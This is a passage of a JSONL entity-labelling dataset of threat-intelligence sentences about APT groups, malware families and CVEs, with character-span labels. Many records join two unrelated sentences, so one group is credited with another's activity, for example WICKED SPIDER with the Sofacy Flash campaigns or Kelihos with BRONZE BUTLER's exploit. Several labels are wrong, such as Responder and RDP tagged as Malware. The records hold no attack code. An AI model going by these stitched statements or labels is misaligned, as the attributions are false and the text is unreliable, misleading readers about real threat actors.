Similar to RIPTIDE campaigns , APT12 infects target systems with HIGHTIDE using a Microsoft Word ( .doc ) document that exploits CVE-2012-0158 .", "spans": [{"start": 31, "end": 39, "label": "Organization"}, {"start": 44, "end": 54, "label": "Organization"}, {"start": 113, "end": 118, "label": "Organization"}, {"start": 147, "end": 155, "label": "Malware"}, {"start": 164, "end": 178, "label": "System"}, {"start": 181, "end": 185, "label": "Indicator"}, {"start": 211, "end": 224, "label": "Vulnerability"}]} {"text": "The WICKED PANDA adversary makes use of a number of open-source and custom tools to infect and move laterally in victim networks . The Sofacy group spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware .", "spans": [{"start": 4, "end": 16, "label": "Organization"}, {"start": 68, "end": 80, "label": "System"}, {"start": 135, "end": 147, "label": "Organization"}, {"start": 191, "end": 196, "label": "System"}, {"start": 197, "end": 205, "label": "Vulnerability"}, {"start": 223, "end": 230, "label": "Malware"}, {"start": 237, "end": 257, "label": "Malware"}]} {"text": "WICKED PANDA refers to the targeted intrusion operations of the actor publicly known as \" Winnti \" , whereas WICKED SPIDER represents this group 's financially-motivated criminal activity . 
APT28 spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 109, "end": 122, "label": "Organization"}, {"start": 190, "end": 195, "label": "Organization"}, {"start": 239, "end": 244, "label": "System"}, {"start": 245, "end": 253, "label": "Vulnerability"}, {"start": 271, "end": 278, "label": "Malware"}, {"start": 285, "end": 305, "label": "Malware"}]} {"text": "WICKED SPIDER has been observed targeting technology companies in Germany , Indonesia , the Russian Federation , South Korea , Sweden , Thailand , Turkey , the United States , and elsewhere . The group spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 42, "end": 62, "label": "Organization"}, {"start": 245, "end": 250, "label": "System"}, {"start": 251, "end": 259, "label": "Vulnerability"}, {"start": 277, "end": 284, "label": "Malware"}, {"start": 291, "end": 311, "label": "Malware"}]} {"text": "Subsequently , two additional articles ( here and here ) were released by Objective-See which provide an analysis of some validated WINDSHIFT samples targeting OSX systems . 
APT28 is using novel techniques involving the EternalBlue exploits and the open source tool Responder to spread laterally through networks and likely target travelers .", "spans": [{"start": 74, "end": 87, "label": "Organization"}, {"start": 132, "end": 149, "label": "System"}, {"start": 174, "end": 179, "label": "Organization"}, {"start": 220, "end": 231, "label": "Vulnerability"}, {"start": 232, "end": 240, "label": "Vulnerability"}, {"start": 249, "end": 265, "label": "Malware"}, {"start": 266, "end": 275, "label": "Malware"}]} {"text": "Pivoting on specific file attributes and infrastructure indicators , Unit 42 was able to identify and correlate additional attacker activity and can now provide specific details on a targeted WINDSHIFT attack as it unfolded at a Middle Eastern government agency . The JHUHUGIT implant became a relatively popular first stage for the Sofacy attacks and was used again with a Java zero-day ( CVE-2015-2590 ) in July 2015 .", "spans": [{"start": 69, "end": 76, "label": "Organization"}, {"start": 244, "end": 261, "label": "Organization"}, {"start": 268, "end": 276, "label": "Malware"}, {"start": 374, "end": 378, "label": "System"}, {"start": 379, "end": 387, "label": "Vulnerability"}, {"start": 390, "end": 403, "label": "Vulnerability"}]} {"text": "The following is a summary of observed WINDSHIFT activity which targeted a Middle Eastern government agency . We are however only aware of one instance - the exploitation of CVE-2013-0640 to deploy MiniDuke - where we believe the exploited vulnerability was a zero-day at the time that the group acquired the exploit .", "spans": [{"start": 90, "end": 107, "label": "Organization"}, {"start": 174, "end": 187, "label": "Vulnerability"}, {"start": 198, "end": 206, "label": "Malware"}, {"start": 260, "end": 268, "label": "Vulnerability"}, {"start": 309, "end": 316, "label": "Vulnerability"}]} {"text": "The WIZARD SPIDER threat group is the Russia-based operator of the TrickBot banking malware . 
FireEye confirmed that since at least November 2017 , APT37 exploited a zero-day Adobe Flash vulnerability , CVE-2018-4878 , to distribute DOGCALL malware to South Korean victims .", "spans": [{"start": 4, "end": 30, "label": "Organization"}, {"start": 67, "end": 91, "label": "System"}, {"start": 94, "end": 101, "label": "Organization"}, {"start": 148, "end": 153, "label": "Organization"}, {"start": 166, "end": 174, "label": "Vulnerability"}, {"start": 175, "end": 186, "label": "System"}, {"start": 203, "end": 216, "label": "Vulnerability"}, {"start": 233, "end": 240, "label": "Malware"}, {"start": 241, "end": 248, "label": "Malware"}]} {"text": "Whitefly configures multiple C&C domains for each target . FireEye iSIGHT Intelligence confirmed that since at least November 2017 , APT37 exploited a zero-day Adobe Flash vulnerability , CVE-2018-4878 , to distribute DOGCALL malware to South Korean victims .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 59, "end": 86, "label": "Organization"}, {"start": 133, "end": 138, "label": "Organization"}, {"start": 151, "end": 159, "label": "Vulnerability"}, {"start": 160, "end": 171, "label": "System"}, {"start": 188, "end": 201, "label": "Vulnerability"}, {"start": 218, "end": 225, "label": "Malware"}, {"start": 226, "end": 233, "label": "Malware"}]} {"text": "In some attacks , Whitefly has used a second piece of custom malware , Trojan.Nibatad . 
A well-funded , highly active group of Middle Eastern hackers was caught , yet again , using a lucrative zero-day exploit in the wild to break into computers and infect them with powerful spyware developed by an infamous cyberweapons dealer named Gamma Group .", "spans": [{"start": 71, "end": 85, "label": "System"}, {"start": 193, "end": 201, "label": "Vulnerability"}, {"start": 202, "end": 209, "label": "Vulnerability"}, {"start": 335, "end": 346, "label": "Organization"}]} {"text": "LUNAR SPIDER had already introduced BokBot to the criminal market at the time Neverquest operations ceased , suggesting that the malware change may have been planned . A well-funded , highly active BlackOasis group of Middle Eastern hackers was caught , yet again , using a lucrative zero-day exploit in the wild to break into computers and infect them with powerful spyware developed by an infamous cyberweapons dealer named Gamma Group .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 36, "end": 42, "label": "System"}, {"start": 198, "end": 214, "label": "Organization"}, {"start": 284, "end": 292, "label": "Vulnerability"}, {"start": 293, "end": 300, "label": "Vulnerability"}, {"start": 426, "end": 437, "label": "Organization"}]} {"text": "Its origins can be traced back to the Storm Worm , a botnet that emerged in 2007 and was one of the earliest criminal malware infrastructures to leverage peer-to-peer technology . 
Kaspersky found the BlackOasis group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday .", "spans": [{"start": 167, "end": 177, "label": "Organization"}, {"start": 180, "end": 189, "label": "Organization"}, {"start": 200, "end": 216, "label": "Organization"}, {"start": 234, "end": 252, "label": "System"}, {"start": 253, "end": 261, "label": "Vulnerability"}, {"start": 278, "end": 291, "label": "Vulnerability"}, {"start": 338, "end": 344, "label": "Malware"}]} {"text": "After the demise of Storm , it was replaced by another new botnet known as Waledac that also leveraged peer-to-peer communications . Kaspersky found the group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday .", "spans": [{"start": 75, "end": 82, "label": "System"}, {"start": 133, "end": 142, "label": "Organization"}, {"start": 176, "end": 194, "label": "System"}, {"start": 195, "end": 203, "label": "Vulnerability"}, {"start": 220, "end": 233, "label": "Vulnerability"}, {"start": 280, "end": 286, "label": "Malware"}]} {"text": "Although BokBot has aided the distribution of TrickBot since 2017 , the development of custom TrickBot modules for the specific campaign has not been observed before . 
BRONZE BUTLER has demonstrated the ability to identify a significant zero-day vulnerability within a popular Japanese corporate tool and then use scan-and-exploit techniques to indiscriminately compromise Japanese Internet-facing enterprise systems .", "spans": [{"start": 9, "end": 15, "label": "System"}, {"start": 46, "end": 54, "label": "System"}, {"start": 94, "end": 110, "label": "System"}, {"start": 168, "end": 181, "label": "Organization"}, {"start": 237, "end": 245, "label": "Vulnerability"}]} {"text": "Kelihos , like many others , implemented a sophisticated spam engine that automatically constructs spam messages from templates and additional inputs to avoid any patterns that can be used in filters . The group has demonstrated the ability to identify a significant zero-day vulnerability within a popular Japanese corporate tool and then use scan-and-exploit techniques to indiscriminately compromise Japanese Internet-facing enterprise systems .", "spans": [{"start": 0, "end": 7, "label": "System"}, {"start": 267, "end": 275, "label": "Vulnerability"}]} {"text": "A second attack that targeted the host 154.46.32.129 started on March 14 , 2017 at 14:44:42 GMT . BRONZE BUTLER has used phishing emails with Flash animation attachments to download and execute Daserf malware , and has also leveraged Flash exploits for SWC attacks .", "spans": [{"start": 98, "end": 111, "label": "Organization"}, {"start": 130, "end": 136, "label": "System"}, {"start": 142, "end": 147, "label": "System"}, {"start": 194, "end": 200, "label": "Malware"}, {"start": 201, "end": 208, "label": "Malware"}, {"start": 234, "end": 239, "label": "System"}, {"start": 240, "end": 248, "label": "Vulnerability"}]} {"text": "As shown within the timeline above , the WINDSHIFT activity observed by Unit 42 falls between January and May of 2018 . 
The group has used phishing emails with Flash animation attachments to download and execute Daserf malware , and has also leveraged Flash exploits for SWC attacks .", "spans": [{"start": 72, "end": 79, "label": "Organization"}, {"start": 148, "end": 154, "label": "System"}, {"start": 160, "end": 165, "label": "System"}, {"start": 212, "end": 218, "label": "Malware"}, {"start": 219, "end": 226, "label": "Malware"}, {"start": 252, "end": 257, "label": "System"}, {"start": 258, "end": 266, "label": "Vulnerability"}]} {"text": "With the Kelihos spam botnet no longer in operation and Levashov behind bars , multiple criminal operators turned to different spam botnets to distribute their crimeware . While investigating a 2016 intrusion , Secureworks identified BRONZE BUTLER exploiting a then-unpatched remote code execution vulnerability ( CVE-2016-7836 ) in SKYSEA Client View , a popular Japanese product used to manage an organization .", "spans": [{"start": 9, "end": 28, "label": "System"}, {"start": 211, "end": 222, "label": "Organization"}, {"start": 234, "end": 247, "label": "Organization"}, {"start": 314, "end": 327, "label": "Vulnerability"}]} {"text": "CraP2P has frequently been used to distribute other malware such as Locky and Dridex , but also supported large scale spam campaigns for dating advertisement and pump-and-dump scams after the demise of Kelihos . 
While investigating a 2016 intrusion , Secureworks incident responders identified BRONZE BUTLER exploiting a then-unpatched remote code execution vulnerability ( CVE-2016-7836 ) in SKYSEA Client View , a popular Japanese product used to manage an organization .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 68, "end": 73, "label": "System"}, {"start": 78, "end": 84, "label": "System"}, {"start": 251, "end": 262, "label": "Organization"}, {"start": 294, "end": 307, "label": "Organization"}, {"start": 374, "end": 387, "label": "Vulnerability"}]} {"text": "The first attack occurred in early January of 2018 with an inbound WINDTAIL sample ( the backdoor family used by WINDSHIFT ) originating from the remote IP address 109.235.51.110 to a single internal IP address within the government agency . Carbanak is a remote backdoor ( initially based on Carberp ) , designed for espionage , data Exfiltration and to provide remote access to infected machines .", "spans": [{"start": 67, "end": 82, "label": "System"}, {"start": 113, "end": 122, "label": "System"}, {"start": 222, "end": 239, "label": "Organization"}, {"start": 242, "end": 250, "label": "Malware"}, {"start": 293, "end": 300, "label": "Malware"}]} {"text": "Unit 42 assesses with high confidence that both the IP address 185.25.50.189 and the domain domforworld.com is associated with WINDSHIFT activity . 
If found on the target system , Carbanak will try to exploit a known vulnerability in Windows XP , Windows Server 2003 , Windows Vista , Windows Server 2008 , Windows 7 , Windows 8 , and Windows Server 2012 , CVE-2013-3660 , for local privilege escalation .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 180, "end": 188, "label": "Malware"}, {"start": 201, "end": 208, "label": "Vulnerability"}, {"start": 234, "end": 241, "label": "System"}, {"start": 247, "end": 254, "label": "System"}, {"start": 269, "end": 276, "label": "System"}, {"start": 285, "end": 292, "label": "System"}, {"start": 307, "end": 314, "label": "System"}, {"start": 319, "end": 326, "label": "System"}, {"start": 335, "end": 342, "label": "System"}, {"start": 357, "end": 370, "label": "Vulnerability"}]} {"text": "The CrowdStrike Falcon Intelligence team , which had been tracking Levashov as the adversary called ZOMBIE SPIDER , was able to help law enforcement seize control of the Kelihos botnet so that it could no longer be used by criminal actors . To enable connections to the infected computer using the Remote Desktop Protocol ( RDP ) , Carbanak sets Termservice service execution mode to Auto .", "spans": [{"start": 4, "end": 35, "label": "Organization"}, {"start": 100, "end": 113, "label": "Organization"}, {"start": 298, "end": 321, "label": "Malware"}, {"start": 324, "end": 327, "label": "Malware"}, {"start": 332, "end": 340, "label": "Malware"}]} {"text": "Over the past few years , Animal Farm has targeted a wide range of global organizations . Carbanak is also aware of the IFOBS banking application and can , on command , substitute the details of payment documents in the IFOBS system .", "spans": [{"start": 26, "end": 37, "label": "Organization"}, {"start": 90, "end": 98, "label": "Malware"}]} {"text": "The group has been active since at least 2009 and there are signs that earlier malware versions were developed as far back as 2007 . 
Sensitive bank documents have be found on the servers that were controlling Carbanak .", "spans": [{"start": 209, "end": 217, "label": "Malware"}]} {"text": "Over the years Kaspersky is tracked multiple campaigns by the Animal Farm group . Existing telemetry indicates that the Carbanak attackers are trying to expand operations to other Baltic and Central Europe countries , the Middle East , Asia and Africa .", "spans": [{"start": 15, "end": 24, "label": "Organization"}, {"start": 62, "end": 79, "label": "Organization"}, {"start": 120, "end": 128, "label": "Malware"}, {"start": 129, "end": 138, "label": "Organization"}]} {"text": "Most recently , Animal Farm deployed the Casper Trojan via a watering-hole attack in Syria . We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers .", "spans": [{"start": 16, "end": 27, "label": "Organization"}, {"start": 41, "end": 54, "label": "System"}, {"start": 113, "end": 121, "label": "Malware"}, {"start": 188, "end": 197, "label": "Organization"}, {"start": 238, "end": 256, "label": "Organization"}, {"start": 280, "end": 289, "label": "Organization"}]} {"text": "A full description of this zero-day attack can be found in this blog post by Kaspersky Lab 's Vyacheslav Zakorzhevsky . 
This report describes the details and type of operations carried out by Carbanak that focuses on financial industry , such as payment providers , retail industry and PR companies .", "spans": [{"start": 77, "end": 90, "label": "Organization"}, {"start": 192, "end": 200, "label": "Malware"}, {"start": 217, "end": 235, "label": "Organization"}, {"start": 246, "end": 263, "label": "Organization"}, {"start": 266, "end": 281, "label": "Organization"}, {"start": 286, "end": 298, "label": "Organization"}]} {"text": "In addition to these , the Animal Farm attackers used at least one unknown , mysterious malware during an operation targeting computer users in Burkina Faso . Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp .", "spans": [{"start": 135, "end": 140, "label": "Organization"}, {"start": 159, "end": 167, "label": "Malware"}, {"start": 235, "end": 243, "label": "Organization"}, {"start": 335, "end": 342, "label": "Malware"}]} {"text": "The malware known as Tafacalou ( aka \" TFC \" , \" Transporter \" ) is perhaps of greatest interest here , because it acts as an entry point for the more sophisticated spy platforms Babar and Dino . 
From 2013 Carbanak intensified its activity focused on banks and electronic payment systems in Russia and in the post-Soviet space .", "spans": [{"start": 21, "end": 30, "label": "System"}, {"start": 39, "end": 42, "label": "System"}, {"start": 49, "end": 60, "label": "System"}, {"start": 179, "end": 184, "label": "System"}, {"start": 189, "end": 193, "label": "System"}, {"start": 206, "end": 214, "label": "Malware"}, {"start": 251, "end": 256, "label": "Organization"}, {"start": 261, "end": 279, "label": "Organization"}, {"start": 321, "end": 326, "label": "Organization"}]} {"text": "Based on the Tafacalou infection logs , we observed that most of the victims are in the following countries : Syria , Iran , Malaysia , USA , China , Turkey , Netherlands , Germany , Great Britain , Russia , Sweden , Austria , Algeria , Israel , Iraq , Morocco , New Zealand , Ukraine . Since 2013 Carbanak has successfully gained access to networks of more than 50 banks and 5 payment systems .", "spans": [{"start": 13, "end": 22, "label": "System"}, {"start": 298, "end": 306, "label": "Malware"}, {"start": 366, "end": 371, "label": "Organization"}, {"start": 378, "end": 393, "label": "Organization"}]} {"text": "In 2013 , both COSEINC and FireEye revealed attacks using Bisonal against Japanese organizations . 
To reduce the risk of losing access to the internal bank network , the Carbanak , in addition to malicious programs , also used for remote access legitimate programs such as Ammy Admin and Team Viewer .", "spans": [{"start": 15, "end": 22, "label": "Organization"}, {"start": 27, "end": 34, "label": "Organization"}, {"start": 58, "end": 65, "label": "System"}, {"start": 170, "end": 178, "label": "Malware"}, {"start": 273, "end": 283, "label": "Malware"}, {"start": 288, "end": 299, "label": "Malware"}]} {"text": "In October 2017 , AhnLab published a report called \" Operation Bitter Biscuit \" , an attack campaign against South Korea , Japan , India and Russia using Bisonal and its successors , Bioazih and Dexbia . Additionally the reports on Carbanak show a different picture , where banks targeted outside of Russia , specifically Europe , USA and Japan are mentioned , which does not match our research .", "spans": [{"start": 18, "end": 24, "label": "Organization"}, {"start": 154, "end": 161, "label": "System"}, {"start": 183, "end": 190, "label": "System"}, {"start": 195, "end": 201, "label": "System"}, {"start": 232, "end": 240, "label": "Malware"}, {"start": 274, "end": 279, "label": "Organization"}]} {"text": "We observed all these characteristics in the Bisonal 's attacks against both Russia and South Korea . These attacks have included criminal groups responsible for the delivery of NewPosThings , MalumPOS and PoSeidon point of sale Malware , as well as Carbanak from the Russian criminal organization we track as Carbon Spider .", "spans": [{"start": 45, "end": 52, "label": "System"}, {"start": 130, "end": 145, "label": "Organization"}, {"start": 206, "end": 214, "label": "Organization"}, {"start": 250, "end": 258, "label": "Malware"}, {"start": 276, "end": 297, "label": "Organization"}, {"start": 310, "end": 323, "label": "Organization"}]} {"text": "We observed all these characteristics in the Bisonal 's attacks against both Russia and South Korea . 
The leader of the crime gang behind the Carbanak and Cobalt malware attacks targeting over a 100 financial institutions worldwide has been arrested in Alicante , Spain , after a complex investigation conducted by the Spanish National Police .", "spans": [{"start": 45, "end": 52, "label": "System"}, {"start": 120, "end": 130, "label": "Organization"}, {"start": 142, "end": 150, "label": "Malware"}, {"start": 199, "end": 221, "label": "Organization"}]} {"text": "The biggest number of Orangeworm 's victims are located in the U.S. , accounting for 17 percent of the infection rate by region . Since 2013 , the cybercrime gang have attempted to attack banks , e-payment systems and financial institutions using pieces of malware they designed , known as Carbanak and Cobalt .", "spans": [{"start": 147, "end": 162, "label": "Organization"}, {"start": 188, "end": 193, "label": "Organization"}, {"start": 196, "end": 205, "label": "Organization"}, {"start": 218, "end": 240, "label": "Organization"}, {"start": 290, "end": 298, "label": "Malware"}, {"start": 303, "end": 309, "label": "Malware"}]} {"text": "In the campaign that targeted Japan , Philippines , and Argentina on June 20 , we found what seems to be a new , undisclosed malware , which we named Gelup . 
Other public tools used by the CopyKittens are Metasploit , a well-known free and open source framework for developing and executing exploit code against a remote target machine ; Mimikatz , a post-exploitation tool that performs credential dumping ; and Empire , a PowerShell and Python post-exploitation agent .", "spans": [{"start": 150, "end": 155, "label": "Malware"}, {"start": 189, "end": 200, "label": "Organization"}, {"start": 205, "end": 215, "label": "Malware"}, {"start": 291, "end": 298, "label": "Vulnerability"}, {"start": 338, "end": 346, "label": "Malware"}, {"start": 413, "end": 419, "label": "Malware"}, {"start": 424, "end": 434, "label": "Malware"}, {"start": 439, "end": 445, "label": "System"}]} {"text": "Also , some code pieces are directly re-used in the analyzed campaigns , such as the i.cmd and exit.exe files , and , at the same time , some new components have been introduced , for instance the rtegre.exe and the veter1605_MAPS_10cr0.exe file . Just a few months later , in February 2015 , we announced the discovery of Carbanak , a cyber-criminal gang that used custom malware and APT techniques to steal millions of dollars while infecting hundreds of financial institutions in at least 30 countries .", "spans": [{"start": 85, "end": 90, "label": "Malware"}, {"start": 95, "end": 103, "label": "Malware"}, {"start": 197, "end": 207, "label": "Malware"}, {"start": 216, "end": 240, "label": "Malware"}, {"start": 323, "end": 331, "label": "Malware"}, {"start": 336, "end": 355, "label": "Organization"}, {"start": 457, "end": 479, "label": "Organization"}]} {"text": "Neptun is installed on Microsoft Exchange servers and is designed to passively listen for commands from the attackers . 
However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 79, "end": 98, "label": "Malware"}, {"start": 108, "end": 117, "label": "Organization"}, {"start": 170, "end": 174, "label": "Organization"}, {"start": 208, "end": 216, "label": "Malware"}, {"start": 246, "end": 255, "label": "Organization"}]} {"text": "The malware then uses WebDAV to upload the RAR archive to a Box account . In one remarkable case , the Carbanak 2.0 gang used its access to a financial institution that stores information about shareholders to change the ownership details of a large company .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 22, "end": 28, "label": "System"}, {"start": 43, "end": 54, "label": "Malware"}, {"start": 103, "end": 111, "label": "Malware"}, {"start": 142, "end": 163, "label": "Organization"}]} {"text": "The PowerShell script will look at the architecture of the system to check which malicious DLL files should be downloaded . This Gorgon Group campaign leveraged spear phishing emails with Microsoft Word documents exploiting CVE-2017-0199 .", "spans": [{"start": 4, "end": 21, "label": "System"}, {"start": 81, "end": 100, "label": "Malware"}, {"start": 176, "end": 182, "label": "System"}, {"start": 188, "end": 212, "label": "Indicator"}, {"start": 224, "end": 237, "label": "Vulnerability"}]} {"text": "McAfee Advanced Threat research determines with confidence that Lazarus is the threat group behind this attack for the following reasons:Contacts an IP address / domain that was used to host a malicious document from a Lazarus previous campaign in 2017 . 
Ke3chang has also leveraged a Java zero-day vulnerability ( CVE-2012-4681 ) , as well as older , reliable exploits for Microsoft Word ( CVE-2010-3333 ) and Adobe PDF Reader ( CVE-2010-2883 ) .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 64, "end": 71, "label": "Organization"}, {"start": 193, "end": 211, "label": "Malware"}, {"start": 219, "end": 226, "label": "Organization"}, {"start": 255, "end": 263, "label": "Organization"}, {"start": 285, "end": 289, "label": "System"}, {"start": 290, "end": 298, "label": "Vulnerability"}, {"start": 315, "end": 328, "label": "Vulnerability"}, {"start": 374, "end": 388, "label": "Indicator"}, {"start": 391, "end": 404, "label": "Vulnerability"}, {"start": 411, "end": 427, "label": "Malware"}, {"start": 430, "end": 443, "label": "Vulnerability"}]} {"text": "According to security 360 Threat Intelligence Center , Goldmouse was observed deploying the nebulous njRAT backdoor . While the URL acts similarly to how eye-watch.in : 443 delivers payloads , we also saw the URL leveraging and exploiting security flaws in Flash : CVE-2015-8651 , CVE-2016-1019 , and CVE-2016-4117 .", "spans": [{"start": 22, "end": 52, "label": "Organization"}, {"start": 101, "end": 115, "label": "Malware"}, {"start": 257, "end": 262, "label": "System"}, {"start": 265, "end": 278, "label": "Vulnerability"}, {"start": 281, "end": 294, "label": "Vulnerability"}, {"start": 301, "end": 314, "label": "Vulnerability"}]} {"text": "Additionally Kaspersky identified a new backdoor that we attribute with medium confidence to Turla . 
The exploit , which takes advantage of CVE-2018-4878 , allows an attacker to execute arbitrary code such as an implant .", "spans": [{"start": 13, "end": 22, "label": "Organization"}, {"start": 40, "end": 48, "label": "Malware"}, {"start": 93, "end": 98, "label": "Organization"}, {"start": 105, "end": 112, "label": "Vulnerability"}, {"start": 140, "end": 153, "label": "Vulnerability"}, {"start": 166, "end": 174, "label": "Organization"}]} {"text": "Trend Micro also reported MuddyWater\u2019s use of a new multi-stage PowerShell-based backdoor called POWERSTATS v3 . Documents with the flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 26, "end": 38, "label": "Organization"}, {"start": 97, "end": 110, "label": "Malware"}, {"start": 113, "end": 122, "label": "Indicator"}, {"start": 132, "end": 137, "label": "System"}, {"start": 138, "end": 145, "label": "Vulnerability"}, {"start": 207, "end": 214, "label": "Vulnerability"}, {"start": 218, "end": 228, "label": "System"}]} {"text": "ESET recently analyzed a new Mac OS sample from the OceanLotus group that had been uploaded to VirusTotal . WannaCry utilizes EternalBlue by crafting a custom SMB session request with hard-coded values based on the target system .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 36, "end": 42, "label": "Malware"}, {"start": 52, "end": 62, "label": "Organization"}, {"start": 108, "end": 116, "label": "Malware"}, {"start": 126, "end": 137, "label": "Vulnerability"}, {"start": 159, "end": 162, "label": "Malware"}]} {"text": "Each of the spear phishing attacks contained links to .doc files , which were really RTF documents that attempt to exploit CVE-2017-8570 ( Composite Moniker ) . 
WannaCry leverages an exploit , codenamed \" EternalBlue \" , that was released by the Shadow Brokers on April 14 , 2017 .", "spans": [{"start": 54, "end": 64, "label": "System"}, {"start": 85, "end": 98, "label": "Malware"}, {"start": 123, "end": 136, "label": "Vulnerability"}, {"start": 139, "end": 148, "label": "Vulnerability"}, {"start": 149, "end": 156, "label": "Vulnerability"}, {"start": 161, "end": 169, "label": "Malware"}, {"start": 183, "end": 190, "label": "Vulnerability"}, {"start": 205, "end": 216, "label": "Vulnerability"}, {"start": 246, "end": 260, "label": "Organization"}]} {"text": "At this point , the attackers know the user has opened the document and send another spear-phishing email , this time containing an MS Word document with an embedded executable . Microsoft addressed the SMBv1 vulnerabilities in March 2017 with Security Bulletin MS17-010 .", "spans": [{"start": 20, "end": 29, "label": "Organization"}, {"start": 132, "end": 148, "label": "Malware"}, {"start": 179, "end": 188, "label": "Organization"}, {"start": 203, "end": 208, "label": "System"}, {"start": 209, "end": 224, "label": "Vulnerability"}]} {"text": "The Word document usually exploits CVE-2012-0158 . The worm leverages an SMBv1 exploit that originates from tools released by the Shadow Brokers threat group in April .", "spans": [{"start": 4, "end": 17, "label": "Malware"}, {"start": 35, "end": 48, "label": "Vulnerability"}, {"start": 73, "end": 78, "label": "System"}, {"start": 79, "end": 86, "label": "Vulnerability"}, {"start": 130, "end": 144, "label": "Organization"}]} {"text": "Sometimes the attackers send an MS PowerPoint document instead , which exploits CVE-2014-6352 . 
If the DoublePulsar backdoor does not exist , then the SMB worm attempts to compromise the target using the Eternalblue SMBv1 exploit .", "spans": [{"start": 14, "end": 23, "label": "Organization"}, {"start": 32, "end": 54, "label": "Malware"}, {"start": 80, "end": 93, "label": "Vulnerability"}, {"start": 103, "end": 124, "label": "Malware"}, {"start": 151, "end": 159, "label": "Malware"}, {"start": 204, "end": 215, "label": "Vulnerability"}, {"start": 216, "end": 221, "label": "System"}, {"start": 222, "end": 229, "label": "Vulnerability"}]} {"text": "Sometimes Patchwork send an MS PowerPoint document instead , which exploits CVE-2014-6352 . Leafminer has developed exploit payloads for this framework ( Table 2 ) that deliver custom malware through attacks against SMB vulnerabilities described by Microsoft .", "spans": [{"start": 10, "end": 19, "label": "Organization"}, {"start": 28, "end": 50, "label": "Malware"}, {"start": 76, "end": 89, "label": "Vulnerability"}, {"start": 92, "end": 101, "label": "Organization"}, {"start": 116, "end": 123, "label": "Vulnerability"}, {"start": 216, "end": 219, "label": "System"}, {"start": 220, "end": 235, "label": "Vulnerability"}, {"start": 249, "end": 258, "label": "Organization"}]} {"text": "The malicious documents seen in recent activity refer to a number of topics , including recent military promotions within the Pakistan Army , information related to the Pakistan Atomic Energy Commission , as well as Pakistan 's Ministry of the Interior . 
The EternalBlue exploits from the framework received worldwide attention after being used in the ransomware campaigns WannaCry in May and Petya / NotPetya in June 2017 .", "spans": [{"start": 4, "end": 23, "label": "Malware"}, {"start": 126, "end": 139, "label": "Organization"}, {"start": 259, "end": 270, "label": "Vulnerability"}, {"start": 271, "end": 279, "label": "Vulnerability"}, {"start": 393, "end": 398, "label": "Malware"}, {"start": 401, "end": 409, "label": "Malware"}]} {"text": "The malicious documents that Unit 42 examined contained legitimate decoy lures as well as malicious embedded EPS files targeting the CVE-2015-2545 and CVE-2017-0261 vulnerabilities . The Leafminer operators use EternalBlue to attempt lateral movement within target networks from compromised staging servers .", "spans": [{"start": 29, "end": 36, "label": "Organization"}, {"start": 109, "end": 118, "label": "Malware"}, {"start": 133, "end": 146, "label": "Vulnerability"}, {"start": 151, "end": 164, "label": "Vulnerability"}, {"start": 187, "end": 196, "label": "Organization"}, {"start": 197, "end": 206, "label": "Organization"}, {"start": 211, "end": 222, "label": "Vulnerability"}]} {"text": "One of the favorite methods used by the Pitty Tiger group to infect users is to use a Microsoft Office Word document which exploits a specific vulnerability ( CVE-2012-0158 ) . 
Symantec also observed attempts by Leafminer to scan for the Heartbleed vulnerability ( CVE-2014-0160 ) from an attacker-controlled IP address .", "spans": [{"start": 40, "end": 57, "label": "Organization"}, {"start": 86, "end": 116, "label": "Malware"}, {"start": 159, "end": 172, "label": "Vulnerability"}, {"start": 177, "end": 185, "label": "Organization"}, {"start": 212, "end": 221, "label": "Organization"}, {"start": 238, "end": 262, "label": "Vulnerability"}, {"start": 265, "end": 278, "label": "Vulnerability"}, {"start": 309, "end": 311, "label": "Indicator"}]} {"text": "This threat group uses a first-stage malware known as Backdoor.APT.Pgift ( aka Troj/ReRol.A ) , which is dropped via malicious documents and connects back to a C2 server . The attachments exploited CVE-2017-8759 which was discovered and documented only five days prior to the campaign .", "spans": [{"start": 5, "end": 17, "label": "Organization"}, {"start": 54, "end": 72, "label": "Malware"}, {"start": 198, "end": 211, "label": "Vulnerability"}]} {"text": "Backdoor.APT.PittyTiger1.3 ( aka CT RAT ) \u2013 This malware is likely used as a second-stage backdoor . Some of the documents exploited CVE-2017-0199 to deliver the payload .", "spans": [{"start": 0, "end": 26, "label": "Malware"}, {"start": 33, "end": 39, "label": "System"}, {"start": 77, "end": 98, "label": "System"}, {"start": 113, "end": 122, "label": "Indicator"}, {"start": 133, "end": 146, "label": "Vulnerability"}]} {"text": "We have observed the Enfal malware in use since 2011 and in conjunction with Backdoor.APT.Pgift as the payload of a malicious document used in spearphishing attacks . 
